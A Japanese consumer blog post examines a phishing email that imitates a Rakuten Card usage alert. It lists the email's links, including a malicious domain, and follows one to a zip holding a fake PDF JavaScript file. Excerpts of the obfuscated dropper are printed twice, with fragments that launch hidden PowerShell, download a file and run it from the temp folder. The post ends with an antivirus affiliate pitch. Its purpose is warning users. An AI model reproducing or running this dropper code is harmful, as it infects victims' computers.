楽天偽装迷惑メール【速報版】カード利用のお知らせに注意！

【速報版】カード利用のお知らせ(本人ご利用分)

楽天カードで買い物をする人にとってはおなじみのメールですよね。

私もよく受信します。

そんな楽天カードのお知らせメールですが、今回受信したメールは少し様子が違いました。

カードを利用した心当たりがないからです。

第三者による不正利用か？

ま～どうせ迷惑メールなんですけどね！

とりあえず、少し調べてみました。

件名「【速報版】カード利用のお知らせ(本人ご利用分)」はどんなメール？
メール内のリンクはどうなってる？
リンク先で開かれたものは？
1. 「もっと詳しくの情報はこちら」のダウンロードが始まる
ダブルクリックでスクリプト動作！そして感染
まとめ

件名「【速報版】カード利用のお知らせ(本人ご利用分)」はどんなメール？

件名「【速報版】カード利用のお知らせ(本人ご利用分)」はどのようなメールなのか？

下の画像は実際に受信したメールを画面キャプチャーしたものです。↓↓

いかがでしょうか？

いつも受信する「カード利用のお知らせ(本人ご利用分)」と変わりないと思いませんか？

見た目だけではなんとも判断しにくいですよね。

そして使った覚えのないカード利用の速報内容。↓↓

使った覚えはないけれども、なんだか妙にリアルな数字だな～。

ひょっとしてほんとに使った？

いやいや、さすがにそこまでボケてません。まだ。

ということは第三者による不正利用か？

先日、第三者による不正ログインを受けてパスワード初期化されたばっかりだし。↓↓

【楽天】パスワード初期化のご連絡！不正ログインに対処してみた！

件名「【楽天】パスワード初期化のご連絡」というメールを受信したことはありませんか？私は受信しましたよ。「また迷惑メールか？」と思ったのですが・・・これ本物っぽいぞ！ほんまにアカンやつや！これは早急に対処しなければ！ということで、「【楽天】パ...

とりあえずもう少し調べてみましょう。

メール内のリンクはどうなってる？

まずはメール内にあちこち貼られているリンクについて調べてみましょう。

メール内のリンクURLアドレス確認（その1）

①　https://www.rakuten-card.co.jp/?scid=mi_rkc_oo_htmlml_logo64919

②　http://bt.mamabasy.com/

③　http://bt.mamabasy.com/

④　http://bt.mamabasy.com/

お、さっそく怪しげなリンクがありますね。

リンク①については楽天カードの公式サイトへのリンクになっています。（ただしクリックしてはいけません）

リンク②・③・④については明らかに楽天カードとは関係のないアドレスとなっていますね。

メール内のリンクURLアドレス確認（その2）

⑤　http://bt.mamabasy.com/

⑥　http://bt.mamabasy.com/

リンク⑤・⑥のいずれも楽天カードとは関係のないアドレスとなっています。

メール内のリンクURLアドレス確認（その3）

⑦　https://r10.to/hOCy8y

⑧　https://r10.to/hbaP0N

⑨　https://r10.to/hOUD72

⑩　https://r10.to/hfXn1X

⑪　http://bt.mamabasy.com/

リンク⑦・⑧・⑨・⑩に関しては、一見あやしげですが、リダイレクト後、楽天カードの公式サイトへと繋がります。

そしてリンク⑪は楽天カードとは無関係です。

メール内のリンクURLアドレス確認（その4）

⑫　http://bt.mamabasy.com/

⑬　http://bt.mamabasy.com/

⑭　http://bt.mamabasy.com/

⑮　http://btmamabasy.com/

⑯　http://bt.mamabasy.com/

⑰　https://www.rakuten-card.co.jp/?scid=mi_rkc_oo_htmlml_kctop11433

リンク⑬・⑭・⑯は楽天とは無関係のリンク。

リンク⑮は多分アドレスの入力間違い。

そしてリンク⑰は楽天カードの公式ページへとつながっています。

では、もっとも登場回数が多かったリンク「http://bt.mamabasy.com/」はどんなページにつながっているのでしょうか？

リンク先で開かれたものは？

一番多く埋め込まれていたリンクURL「http://bt.mamabasy.com/」はどんなページにつながるのか？

実際にクリックしてみました。

「もっと詳しくの情報はこちら」のダウンロードが始まる

リンクをクリックして「http://bt.mamabasy.com/」が開かれると、次のようなダウンロードのダイヤログボックスが。↓↓

「もっと詳しくの情報はこちら.zip」というファイルのダウンロードを促してきました。

「もっと詳しくの情報はこちら.zip」・・・またお前かっ！

せっかくなのでダウンロード。↓↓

もっと詳しくの情報はこちら.zip

そして解凍したファイル。↓↓

qlqfzrwvjxvjx.PDF.js

拡張子「.js」は、Windows上でダブルクリックすると、とんでもない事態になりかねない危険なファイルです。

ダブルクリックでスクリプト動作！そして感染

「スクリプトファイル」はWindows上でダブルクリックすると、ファイル内に仕込まれているスクリプトが動作をはじめ、感染してしまいます。

ちなみに中に仕込まれているスクリプト内容は、「メモ帳」で開いて確認することができます。↓↓

var popopopopopopopopop_0x45a5 = [
'eCjIuzXO',
'ey\x22;',
'FMF',
'AFrfhFBFvRFlFUNFb',
'FxFSFcH.FShFellFExFeFcFuFtFeF(F\x22cFmdF.FExFeF\x22F,F\x20\x22/c\x20pFoFweFrFshFeFlFl.exeF\x20-nFoFpFrofFilFeF\x20-wFinFdFowFsF',
'yF\x20FbFyFpaFss\x20F(newF-FoFbjFecFt\x20FsFyFs',
'FteFmF.ne',
'FtF',
'.FwFeFb',
';F\x20IFnvFOFke-FWMFIFMFeFthFOFD\x20-FClaFSFs\x20FWFIn3F2_FPF',
'rFOFcFEFSFS\x20-FNaFMeF\x20FCFrFeFaFtF',
'eF\x20-FAFrFguFmeFntFLIsFt\x20\x27F%tEFMFpF%leI20.EFxe\x27\x22F,\x20F\x22F\x22,',
'GCFQi',
'jvzjN',
'LkasC',
'input',
'Ewynq',
'dExtb',
'SCvco',
'CBOlH',

～～～～～～～～～～中略～～～～～～～～～～

(_0x18ae0d, _0x36ba9c[popopopopopopopopop_0x3ef1('0x51')])) || !_0x2d458f[popopopopopopopopop_0x3ef1('0x2b')](_0x36ba9c[popopopopopopopopop_0x3ef1('0x5b')](_0x18ae0d, _0x36ba9c[popopopopopopopopop_0x3ef1('0x52')]))) {
_0x36ba9c[popopopopopopopopop_0x3ef1('0x5a')](_0x18ae0d, '0');
} else {
_0x95bab5();
}
})();
} else {
(function () {
return ![];
}[popopopopopopopopop_0x3ef1('0x3f')](popopopopopopopopop_0x3ef1('0x58') + popopopopopopopopop_0x3ef1('0x37'))['apply'](popopopopopopopopop_0x3ef1('0x5c')));
}
}
} else {
(function () {
return !![];
}['constructor'](_0x36ba9c[popopopopopopopopop_0x3ef1('0x5b')](_0x36ba9c['fUuMN'], _0x36ba9c['napHX']))['call'](popopopopopopopopop_0x3ef1('0x5d')));
}
}
_0x31fb7d(++_0x4ed482);
}
}
try {
if (_0x283a8c) {
return _0x31fb7d;
} else {
_0x268387[popopopopopopopopop_0x3ef1('0x4e')](_0x31fb7d, 0x0);
}
} catch (_0x65dc71) {
}
}

var popopopopopopopopop_0x45a5 = [

'eCjIuzXO',

'ey\x22;',

'FMF',

'AFrfhFBFvRFlFUNFb',

'FxFSFcH.FShFellFExFeFcFuFtFeF(F\x22cFmdF.FExFeF\x22F,F\x20\x22/c\x20pFoFweFrFshFeFlFl.exeF\x20-nFoFpFrofFilFeF\x20-wFinFdFowFsF',

'yF\x20FbFyFpaFss\x20F(newF-FoFbjFecFt\x20FsFyFs',

'FteFmF.ne',

'FtF',

'.FwFeFb',

';F\x20IFnvFOFke-FWMFIFMFeFthFOFD\x20-FClaFSFs\x20FWFIn3F2_FPF',

'rFOFcFEFSFS\x20-FNaFMeF\x20FCFrFeFaFtF',

'eF\x20-FAFrFguFmeFntFLIsFt\x20\x27F%tEFMFpF%leI20.EFxe\x27\x22F,\x20F\x22F\x22,',

'GCFQi',

'jvzjN',

'LkasC',

'input',

'Ewynq',

'dExtb',

'SCvco',

'CBOlH',

～～～～～～～～～～中略～～～～～～～～～～

(_0x18ae0d, _0x36ba9c[popopopopopopopopop_0x3ef1('0x51')])) || !_0x2d458f[popopopopopopopopop_0x3ef1('0x2b')](_0x36ba9c[popopopopopopopopop_0x3ef1('0x5b')](_0x18ae0d, _0x36ba9c[popopopopopopopopop_0x3ef1('0x52')]))) {

_0x36ba9c[popopopopopopopopop_0x3ef1('0x5a')](_0x18ae0d, '0');

} else {

_0x95bab5();

}

})();

} else {

(function () {

return ![];

}[popopopopopopopopop_0x3ef1('0x3f')](popopopopopopopopop_0x3ef1('0x58') + popopopopopopopopop_0x3ef1('0x37'))['apply'](popopopopopopopopop_0x3ef1('0x5c')));

}

} else {

(function () {

return !![];

}['constructor'](_0x36ba9c[popopopopopopopopop_0x3ef1('0x5b')](_0x36ba9c['fUuMN'], _0x36ba9c['napHX']))['call'](popopopopopopopopop_0x3ef1('0x5d')));

}

_0x31fb7d(++_0x4ed482);

}

try {

if (_0x283a8c) {

return _0x31fb7d;

} else {

_0x268387[popopopopopopopopop_0x3ef1('0x4e')](_0x31fb7d, 0x0);

}

} catch (_0x65dc71) {

}

今回の「.js」のスクリプトファイルがどのような挙動をもたらすものなのかはわかりませんが、ウイルス感染の例としては次のような症状が挙げられます。

パソコン内のファイルを勝手に暗号化、復号するためのツールを購入させる（通称「身代金型ウイルス」「ランサムウェア」）
ネットバンキングに勝手に不正送金してしまう

など、大きな被害をもたらすものが多いので、もしも誤って「js」ファイルをダウンロードしてしまったら、絶対にダブルクリックしてはいけません。

もしも誤ってダブルクリックしてしまった場合は、すみやかにウイルス対策ソフトを入れて除去しましょう。

ウイルスバスタークラウド

まとめ

件名「【速報版】カード利用のお知らせ(本人ご利用分)」という迷惑メールについて調べてみましたが、いかがだったでしょうか？

楽天カード関連の迷惑メールって本物と区別がつかないようなクオリティのものが多いのと、お金が直接絡んでくるもんですから、受信するといつも「ドキッ」としちゃうんですよね！

そのうち恋に落ちるかも。

今回は流行りのスクリプトファイルが絡んでくるので、それなりに危険です。

ほんの軽い気持ちでクリックしたつもりが、いつのまにかウイルス感染していたり、気づかないうちに個人情報を抜き取られたりする被害につながることが多々あります。

そうならないために一番安価で確実な方法。

それはウイルスバスタークラウドの導入です。

ウイルスバスタークラウド

年額数千円程度で3台までの端末をウイルス対策をはじめ様々なセキュリティー防護できるのでおすすめです！

では、楽しいネットライフをお過ごしください！